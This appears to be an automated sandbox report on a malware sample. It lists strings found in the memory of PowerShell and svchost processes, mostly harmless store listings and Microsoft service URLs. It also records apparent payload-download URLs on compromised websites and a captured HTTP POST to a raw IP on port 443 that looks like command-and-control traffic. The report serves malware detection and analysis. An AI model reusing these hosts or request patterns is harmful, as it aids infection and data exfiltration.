Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp | String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4
bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: unknown | DNS traffic detected: queries for: physio-svdh.ch
Source: unknown | HTTP traffic detected: POST /hzctvbal94fl2bqa/ HTTP/1.1DNT: 0Referer: 173.249.20.233/hzctvbal94fl2bqa/Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 173.249.20.233:443Content-Length: 8516Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identruz
Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | String found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: svchost.exe, 0000000F.00000003.745654937.00000279643DA000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.dig
Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.700748377.000002712B6E5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/D
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: http://gmpg.org/xfn/11
Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | String found in binary or memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmp | String found in binary or memory: http://isatechnology.com
Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: svchost.exe, 0000000F.00000003.745654937.00000279643DA000.00000004.00000001.sdmp | String found in binary or memory: http://oneocsp.mic
Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | String found in binary or memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.697362222.00000271148A3000.00000004.00000001.sdmp | String found in binary or memory: http://physio-svdh.ch
Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp | String found in binary or memory: http://r3.i.lencr.org/0-
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/03
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: powershell.exe, 00000004.00000002.689707383.00000271135D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                Source: powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmpString found in binary or memory: http://www.isatechnology.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.aadrm.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.office.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.onedrive.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/site/0H/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.entity.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                Source: svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cr.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://devnull.onenote.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://directory.services.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
